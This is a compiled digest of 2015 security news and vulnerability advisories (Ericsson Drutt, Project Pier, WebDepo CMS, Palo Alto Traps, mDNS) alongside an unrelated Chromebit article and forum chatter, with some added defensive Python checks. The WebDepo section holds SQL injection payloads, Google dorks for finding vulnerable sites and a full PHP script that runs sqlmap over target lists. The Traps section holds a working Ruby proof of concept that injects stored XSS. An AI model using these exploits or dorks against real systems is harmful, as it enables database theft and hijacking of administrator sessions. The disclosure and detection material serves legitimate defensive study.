17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
24.Feb.2015 - Contacted Corporate Security Office team
02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
02.Mar.2015 - Shared vulnerability details
06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
08.Mar.2015 - Agreed on public disclosure timelines
31.Mar.2015 - Public disclosure

Ericsson Drutt MSDP (3PI Manager) Cross Site Scripting

+--------------------------------------------------------------------+
+ Ericsson Drutt MSDP (3PI Manager) - Cross Site Scripting Injection +
+--------------------------------------------------------------------+

Affected Product: Ericsson Drutt MSDP (3PI Manager)
Vendor Homepage : www.ericsson.com
Version : 4, 5 and 6
CVE v2 Vector : AV:N/AC:M/Au:N/C:N/I:P/A:N
CVE :
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes

+-------------+
+ Description +
+-------------+
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.
The 3PI Manager component contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code in the user's browser session in the context of the affected site.

+----------------------+
+ Exploitation Details +
+----------------------+
The vulnerable input point and respective URL path is listed below:
http(s)://<drutt>:<port>/tpim/register.do
POST Data: companyName=aaa&contactPersonName=secuid0&contactPersonEmail=[XSS]&contactPersonPhone=aa&comment=&send.pressed=Save

+---------------------+
+ Disclosure Timeline +
+---------------------+
17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
24.Feb.2015 - Contacted Corporate Security Office team
02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
02.Mar.2015 - Shared vulnerability details
06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
08.Mar.2015 - Agreed on public disclosure timelines
12.Mar.2015 - Patches released
31.Mar.2015 - Public disclosure

Source

Ericsson Drutt MSDP (3PI Manager) Open Redirect

+------------------------------------------------------+
+ Ericsson Drutt MSDP (3PI Manager) - Open Redirection +
+------------------------------------------------------+

Affected Product: Ericsson Drutt MSDP (3PI Manager)
Vendor Homepage : www.ericsson.com
Version : 4, 5 and 6
CVE v2 Vector : AV:N/AC:M/Au:S/C:N/I:P/A:N
CVE : CVE-2015-2167
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes

+-------------+
+ Description +
+-------------+
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP.
The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The identified vulnerability affects the 3PI Manager component and allows remote attackers to redirect (authenticated) users to arbitrary web sites and conduct phishing attacks via unspecified vectors. +----------------------+ + Exploitation Details + +----------------------+ The vulnerable parameter and the respective URL path is listed below: http://<drutt>:<port>/jsp/start-3pi-manager.jsp?url=http://www.google.com +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 12.Mar.2015 - Patches released 31.Mar.2015 - Public disclosure
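The open redirect above takes an attacker-supplied url= value and sends the browser there. Below is an added example (not Ericsson's code) of the server-side check that closes that class of bug: accept only same-host URLs or single-slash absolute paths, and handle the parser tricks browsers fall for (backslashes, scheme-relative //host, user@host). The host name and default page are constructed placeholders.

```python
# Added example, not Ericsson's code: a redirect-target check of the kind that
# closes the start-3pi-manager.jsp?url= open redirect described above.
# OWN_HOST and DEFAULT_TARGET are constructed placeholders.
from urllib.parse import urlsplit

OWN_HOST = "portal.example.com"                 # constructed: the portal's own host
DEFAULT_TARGET = "/jsp/start-3pi-manager.jsp"   # local page to land on when rejecting


def is_safe_redirect(url: str, own_host: str = OWN_HOST) -> bool:
    """True only when url stays on own_host or is an absolute path on this site."""
    if not url or any(ord(c) < 0x21 for c in url):
        return False                        # empty, control characters or whitespace
    # Browsers read backslashes as slashes in the authority part ("/\evil.example"),
    # so normalise first and validate what the browser would actually see.
    candidate = url.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False                        # malformed IPv6 brackets and similar
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False                        # javascript:, data:, vbscript: ...
    if parts.netloc:
        # Compare the parsed hostname, so "https://own@evil" and
        # "https://own.evil.example" are both refused.
        return (parts.hostname or "").lower() == own_host.lower()
    # No authority: accept a single-slash absolute path only. "//host" and
    # "///host" would be read as scheme-relative URLs by the browser.
    return candidate.startswith("/") and not candidate.startswith("//")


def redirect_target(url: str, own_host: str = OWN_HOST) -> str:
    """Value the server should put in the Location header for a url parameter."""
    return url if is_safe_redirect(url, own_host) else DEFAULT_TARGET
```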
11. I was doing my RASP (Runtime Application Self-Protection) module testing on the latest version of Project Pier, i.e. 0.8.8 SP2, yesterday and found an XSS vulnerability in search.

http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E

The XSS occurs after authentication.

Thanks,
Jaydeep Dave

Source
12. Advisory: SQLi vulnerabilities in application CMS WebDepo
Affected application web: Application CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day

==========================
Vulnerability Description:
==========================
Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilities.

==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood'])

==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp

Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16

Ex: http://target.us/text.asp?wood=(id)+Exploit

==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
 -t : SET TARGET.
 -f : SET FILE TARGETS.
 -p : SET PROXY
Execute:
 php WebDepoxpl.php -t target
 php WebDepoxpl.php -f targets.txt
 php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html

==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="

==========================
Solution:
==========================
Sanitizing all requests coming from the client

==========================
Credits:
==========================
AUTHOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil

==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx

Exploit:
<?php
/*
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
# VENDOR: http://www.webdepot.co.il
# GET VULN: wood=(id)
# $wood=intval($_REQUEST['wood'])
-----------------------------------------------------------------------------
# DBMS: 'MySQL'
# Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# DBMS: 'Microsoft Access'
# Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
-----------------------------------------------------------------------------
# http://target.us/text.asp?wood=(id)+Exploit
# GOOGLE DORK: inurl:"text.asp?wood="
# GOOGLE DORK: site:il inurl:"text.asp?wood="
# GOOGLE DORK: site:com inurl:"text.asp?wood="
# --help:
#  -t : SET TARGET.
#  -f : SET FILE TARGETS.
#  -p : SET PROXY
# Execute:
#  php WebDepoxpl.php -t target
#  php WebDepoxpl.php -f targets.txt
#  php WebDepoxpl.php -t target -p 'http://localhost:9090'
-----------------------------------------------------------------------------
# EXPLOIT MASS USE SCANNER INURLBR
# COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"
# DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
-----------------------------------------------------------------------------
# TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

$folder_SqlMap = "python ../sqlmap/sqlmap.py";
$op_ = getopt('f:t:p:', array('help::'));

// Banner (layout as received; kept on one line)
echo " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n";

$menu = "
 -t : SET TARGET.
 -f : SET FILE TARGETS.
 -p : SET PROXY
Execute:
 php 0dayWebDepo.php -t target
 php 0dayWebDepo.php -f targets.txt
 php 0dayWebDepo.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;

$params = array(
    'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
    'file'   => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
    'proxy'  => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
    'folder' => $folder_SqlMap,
    'line'   => "-----------------------------------------------------------------------------------"
);

not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;

function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __plus() {
    ob_flush();
    flush();
}

function __listTarget($file) {
    $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
    echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n";
    foreach ($tgt_ as $url) {
        echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n";
        __plus();
        $file['target'] = $url;
        __exec($file) . __plus();
    }
}

function __exec($params) {
    __plus();
    echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n";
    echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n";
    $command = "python ../sqlmap/sqlmap.py -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2";
    system($command, $dados) . empty($dados[0]) ? exit() : NULL;
    __plus();
}

Source
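The advisory gives the two payload shapes (MySQL error-based and Access UNION) that hit text.asp?wood=. Below is an added example, not part of the advisory or its exploit script, that turns those shapes into detection logic over web-server access logs; the log lines are constructed samples in Common Log Format.

```python
# Added example, not part of the advisory or its exploit script: flags requests
# to text.asp whose wood= parameter carries the injection patterns quoted above.
# SAMPLE_LOG holds constructed access-log lines, not real traffic.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

SAMPLE_LOG = """\
203.0.113.7 - - [30/Mar/2015:10:01:02 +0000] "GET /text.asp?wood=17 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Mar/2015:10:01:05 +0000] "GET /text.asp?wood=17+AND+(SELECT+8880+FROM(SELECT+COUNT(*),CONCAT(0x496e75726c,version(),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) HTTP/1.1" 500 311
203.0.113.9 - - [30/Mar/2015:10:01:06 +0000] "GET /text.asp?wood=17+UNION+ALL+SELECT+NULL,NULL,CHR(113)%26CHR(112),NULL+FROM+MSysAccessObjects%16 HTTP/1.1" 200 4870
198.51.100.4 - - [30/Mar/2015:10:02:00 +0000] "GET /index.asp?wood=1+UNION+SELECT+1 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each pattern corresponds to one building block of the MySQL or Access payloads
# in the advisory; "non_numeric_id" (added in analyse_request) catches anything
# else that is not the integer id the application expects.
SIGNATURES = {
    "mysql_error_based": re.compile(r"information_schema|floor\(\s*rand\(", re.I),
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "access_chr_concat": re.compile(r"chr\(\d+\)\s*&\s*chr\(", re.I),
    "access_system_table": re.compile(r"msysaccessobjects", re.I),
}


def analyse_request(target):
    """Signature names hit by the wood= parameter of one request target, or []."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/text.asp"):
        return []
    hits = set()
    for raw in parse_qs(parts.query, keep_blank_values=True).get("wood", []):
        value = unquote_plus(raw)       # second pass catches double-encoded payloads
        if not re.fullmatch(r"\s*\d+\s*", value):
            hits.add("non_numeric_id")
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)


def scan_log(text):
    """One finding per suspicious request: who, when, what the server answered, why."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyse_request(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": int(m["status"]), "hits": hits})
    return findings
```

A 500 on the error-based probe followed by a 200 on the UNION variant from the same source, as in the sample, is the sequence to alert on rather than either request alone.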
13. #!/usr/bin/ruby
=begin
------------------------------------------------------------------------
Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)
Vendor: Palo Alto Networks
Vulnerable Version(s): 3.1.2.1546
Tested Version: 3.1.2.1546
Advisory Publication: 29 March 2015
Vendor Notification: 17 October 2014
Vulnerability Type: Stored Cross Site Scripting
CVE Reference: CVE-2015-2223
Risk Level: High
Solution Status:
Discovered and Provided: Michael Hendrickx, help AG
------------------------------------------------------------------------

About the product:
Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this “trap” to a central server for logging purposes.

About the vulnerability:
An attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps’ admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.

The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:
<b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments>

A POC script can be found at the following URL:
https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb
------------------------------------------------------------------------

Solution:
The vendor was notified back in October 2014, and we’ve sent a few follow ups since. Contact the vendor for the patch details.

References:
[1] help AG middle East: http://www.helpag.com/
[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html
------------------------------------------------------------------------
=end

# PA traps fuzzer?
require 'net/http'

def usage
  puts "pa_traps.rb <trapserver>"
  exit
end

usage if ARGV.empty?

# get the arguments
traps = {}
traps[:server] = ARGV[0]
traps[:port] = 2125

http_headers = {
  "Content-Type" => "application/soap+xml; charset=utf-8",
  "Expect" => "100-continue",
  "Connection" => "Keep-Alive"
}

soap_envelope = <<-SOAP
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">http://tempuri.org/IClientServices/SendPreventions</a:Action>
    <a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>
    <a:ReplyTo>
      <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>
    </a:ReplyTo>
    <a:To s:mustUnderstand="1">http://10.13.6.82:2125/CyveraServer/</a:To>
  </s:Header>
  <s:Body>
    <SendPreventions xmlns="http://tempuri.org/">
      <machine>VMNAME1</machine>
      <preventions xmlns:b="http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:PreventionDetails>
          <b:Id>0</b:Id>
          <b:MachineName>AEDXBNB-MHE</b:MachineName>
          <b:Message>Exploit attempt was prevented by Traps</b:Message>
          <b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>
          <b:ProcessName>Excel.exe</b:ProcessName>
          <b:Time>2014-10-15T13:18:56</b:Time>
          <b:UserName> HELPAG\\hendrickx </b:UserName>
          <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments>
          <b:CyveraCode>EXEPROT</b:CyveraCode>
          <b:CyveraInternalCode i:nil="true"/>
          <b:CyveraVersion>3.1.2.1546</b:CyveraVersion>
          <b:FileName> <script> alert("xss"); </script> </b:FileName>
          <b:PreventionMode>Notify</b:PreventionMode>
          <b:ProcessHash i:nil="true"/>
          <b:ProcessVersion>1.12.1.0</b:ProcessVersion>
          <b:Sent>false</b:Sent>
          <b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>
          <b:Source>Unknown</b:Source>
          <b:Status i:nil="true"/>
          <b:URL> <script> alert("xss in URL"); </script> </b:URL>
        </b:PreventionDetails>
      </preventions>
    </SendPreventions>
  </s:Body>
</s:Envelope>
SOAP

if traps[:server].empty?
  puts "Need a traps server"
  usage
end

# summary
puts "Testing #{traps[:server]}"

Net::HTTP.start(traps[:server], traps[:port]) do |http|
  r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers)
  puts r1
  puts r1.inspect
end

Source
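The stored XSS above rides in free-text fields of the SendPreventions message that the admin page later renders unescaped. Below is an added example (not Palo Alto or help AG code) of the server-side check and the output escaping that would catch it: it reads the fields the advisory names from a constructed envelope modelled on the PoC, flags any that carry markup, and shows the escaped form the admin view should emit. It handles both a payload sent as raw child elements (as in the PoC) and one sent as escaped text.

```python
# Added example, not Palo Alto or help AG code: checks the free-text fields of a
# SendPreventions message named in the advisory and escapes them for display.
# SAMPLE_ENVELOPE is constructed after the PoC request above.
import html
import re
import xml.etree.ElementTree as ET

NS = {
    "s": "http://www.w3.org/2003/05/soap-envelope",
    "b": "http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces",
}
# The three fields the advisory reports, plus two more that are just as
# client-controlled and reach the same screen.
FREE_TEXT_FIELDS = ("Arguments", "FileName", "URL", "ProcessName", "MachineName")
# Anything that could open a tag, a script URL or an event-handler attribute.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!?]|javascript\s*:|\bon[a-z]+\s*=", re.I)

SAMPLE_ENVELOPE = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
 <s:Body>
  <SendPreventions xmlns="http://tempuri.org/">
   <machine>VMNAME1</machine>
   <preventions xmlns:b="http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces"
                xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
    <b:PreventionDetails>
     <b:MachineName>AEDXBNB-MHE</b:MachineName>
     <b:ProcessName>Excel.exe</b:ProcessName>
     <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments>
     <b:FileName>fake.exe</b:FileName>
     <b:URL>&lt;script&gt; alert("xss in URL"); &lt;/script&gt;</b:URL>
     <b:ProcessHash i:nil="true"/>
    </b:PreventionDetails>
   </preventions>
  </SendPreventions>
 </s:Body>
</s:Envelope>
"""


def inner_content(elem):
    """Text of elem plus any child markup serialised back to a string, so a
    payload sent as raw child elements is seen as well as one sent as text."""
    parts = [elem.text or ""]
    for child in elem:                          # tostring() includes child.tail
        parts.append(ET.tostring(child, encoding="unicode"))
    return "".join(parts)


def extract_preventions(envelope_xml):
    """Return one dict per PreventionDetails record, keyed by field name."""
    root = ET.fromstring(envelope_xml)
    records = []
    for det in root.iterfind(".//b:PreventionDetails", NS):
        rec = {}
        for field in FREE_TEXT_FIELDS:
            node = det.find("b:" + field, NS)
            rec[field] = inner_content(node) if node is not None else ""
        records.append(rec)
    return records


def suspicious_fields(record):
    """Names of fields that carry markup and should be rejected or flagged."""
    return sorted(f for f, v in record.items() if MARKUP_RE.search(v))


def render_cell(value):
    """What the admin page must emit for a field: escaped text, never raw."""
    return html.escape(value, quote=True)
```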
14. It doesn't matter what you get, man, I didn't go hunting for vulnerabilities for a T-shirt and a USB stick. I did this to help; I don't understand why all of you keep going on about "money". Maybe some of us help because we want to, not to get something in return. @askvrit well yes, man, but for them to message you that it's a duplicate after they first said it was valid is really pathetic.
15. I joined in too, let's see if I get lucky.
16. Imagine — reaching into your pocket — and pulling out a computer! Google has made it possible to put your whole computer into your pocket by introducing a whole new kind of Chrome device — a tiny stick that plugs into the HDMI port of any display.

Dubbed Chromebit, it is a fully featured computer-on-a-stick from Asus that Google promises will retail for less than $100 when it comes out this summer. You just need to plug a Chromebit right into your TV or any monitor in order to turn it into a full-fledged Chrome OS-based computer.

Google Chromebit is portable with an impressive look and will be available in three attractive colors — silver, blue and orange. It has a smarter clinch on the business end so that a user can easily plug it into practically any HDMI port without the need of any extension cable.

SPECIFICATIONS
This tiny little Google Chromebit stick comes packaged with:
- Rockchip RK3288 (with quad-core Mali 760 graphics)
- 2GB of RAM
- 16GB of solid state storage memory
- a single full-size USB 2.0 port
- Bluetooth 4.0 Smart Ready controller
- WiFi 802.11ac support
- ARM Mali 760 quad-core GPU

Although Google Chromebit will not be the most powerful computer you could plug into your TV, it should not be too bad for the browser-based operating system. Google believes that Chromebit will be of great use in schools and small businesses due to its price and easy manageability.

$149 CHROMEBOOK
In addition to Chromebit, Google also announced several cheap Chrome devices, including the Haier Chromebook 11 (available online at Amazon) and the Hisense Chromebook (available at Walmart). Both are 11.6-inch Chromebooks that will be available at $149, making them cheaper and more affordable than most smartphones.

The basic specifications for the Haier and Hisense Chromebooks are essentially the same: 2GB of RAM, two USB ports, 16GB solid flash storage, SD Card reader and HDMI output, as well as a 720p webcam and WiFi and Bluetooth antennas.

$249 CHROMEBOOK FLIP
The technology giant also announced that ASUS plans to launch a new "Chromebook Flip" convertible with the same internals later this spring for $249. Chromebook Flip will come with a 10.1-inch touchscreen display that flips all the way around so the device can be used in tablet mode.

Source
17. The Department of Homeland Security-sponsored CERT at Carnegie Mellon University on Tuesday released an advisory warning infrastructure providers of a vulnerability in Multicast DNS, or mDNS, that could leak device information that could be leveraged in high volume DDoS amplification attacks.

“I would say the most serious concern with a vulnerability like this is abuse for DDoS campaigns, since it’s using UDP (easily spoofable) and the amplification in most cases is well over 100 percent,” said security researcher Chad Seaman, who reported the vulnerability. “We’ve seen a huge surge in the abuse of SSDP devices being used in reflection attacks, this is along the same lines and offers greater amplification, but luckily there aren’t nearly as many vulnerable mDNS devices in the wild.”

The advisory lists a number of vendors whose devices are affected, including Canon, HP and IBM among others. Cisco, D-Link and Microsoft devices are in the clear, while it is unclear whether Apple, a number of Linux distributions, and Dell devices are affected.

Mostly, mDNS is used in consumer devices to simplify configuration and integration of services and networking, Seaman said. The issue is that mDNS devices could respond to unicast queries from outside a local link network and those responses could include network and device data that would facilitate a large-scale DDoS attack.

According to the advisory, mDNS enables devices on a local link network to discover other services and devices. The fact that some devices would respond to unicast queries from outside goes against the implementation recommendations in RFC 6762.

“It’s very easy to abuse. It’s little more than running a standard DNS query for a specific string/service name on port 5353. If you get a reply to the most generic query, the machine is accepting input over the WAN interface that it shouldn’t be,” Seaman said.

The leaked information depends on the particular device and how the service it supports is configured. The useful information includes device names, model numbers, serial numbers, network configuration information, and more.

“These could be used for social engineering attacks, targeting purposes, reconnaissance purposes, etc.,” Seaman said.

The CERT advisory recommends either blocking inbound and outbound mDNS on the WAN, or disabling mDNS services.

As with other noteworthy amplification attacks, large amounts of bad traffic are pointed at a specific online service, in most cases over-running it in short order.

“As a reflector it would just be a high number of incoming DNS queries targeted at port 5353, likely from a spoofed source to achieve reflection. As a victim you would see a wide array of replies coming back from various devices,” said Seaman, who has posted sample traffic signatures that would be similar to those used in such an attack. “However because of mDNS explicitly stating it should only operate on port 5353 in the RFC, all requests will be sourced from port 5353 during the reflection. Meaning mitigation should be as simple as blocking port 5353 to protect vulnerable internal devices and drop incoming traffic sourced from port 5353 to help mitigate an attack.”

Source
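Seaman describes two things a network owner can look for: a device answering unicast mDNS queries that arrive from outside its link, and the port-5353-sourced reply traffic a reflector sends out. Below is an added example (not from the CERT advisory or this article) that applies both checks to constructed UDP flow records and reports the amplification ratio per reflector/outside-host pair; the site prefixes are assumed.

```python
# Added example, not from the CERT advisory or the article: a flow-level check
# for an mDNS responder answering unicast queries from outside its link and for
# the reflection traffic that produces. Flow records and LOCAL_NETS are constructed.
import ipaddress
from collections import defaultdict

MDNS_PORT = 5353
# Assumed internal prefixes; anything else counts as "outside the local link".
LOCAL_NETS = [ipaddress.ip_network("192.168.0.0/16"), ipaddress.ip_network("10.0.0.0/8")]

# Constructed UDP flow records: (src_ip, src_port, dst_ip, dst_port, bytes)
SAMPLE_FLOWS = [
    ("192.168.1.20", 5353, "224.0.0.251", 5353, 80),      # ordinary multicast query on the LAN
    ("198.51.100.77", 40123, "192.168.1.50", 5353, 46),   # unicast query from the WAN: device exposed
    ("192.168.1.50", 5353, "198.51.100.77", 40123, 512),  # its answer, about 11x the request size
    ("203.0.113.5", 1234, "192.168.1.50", 5353, 46),      # spoofed source = the reflection victim
    ("192.168.1.50", 5353, "203.0.113.5", 1234, 530),     # answers land on the victim
    ("192.168.1.50", 5353, "203.0.113.5", 1234, 530),
]


def is_local(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def analyse_flows(flows):
    """Return ({exposed_device: wan_query_count},
               {(reflector, outside_host): {"queries", "replies", "bytes_in",
                                            "bytes_out", "amplification"}})."""
    exposed = defaultdict(int)
    pairs = defaultdict(lambda: {"queries": 0, "replies": 0, "bytes_in": 0, "bytes_out": 0})
    for src, sport, dst, dport, nbytes in flows:
        if ipaddress.ip_address(dst).is_multicast:
            continue                                # link-local multicast is normal mDNS
        if dport == MDNS_PORT and is_local(dst) and not is_local(src):
            exposed[dst] += 1                       # query accepted from outside the link
            p = pairs[(dst, src)]
            p["queries"] += 1
            p["bytes_in"] += nbytes
        elif sport == MDNS_PORT and is_local(src) and not is_local(dst):
            p = pairs[(src, dst)]                   # reply leaving the site from port 5353
            p["replies"] += 1
            p["bytes_out"] += nbytes
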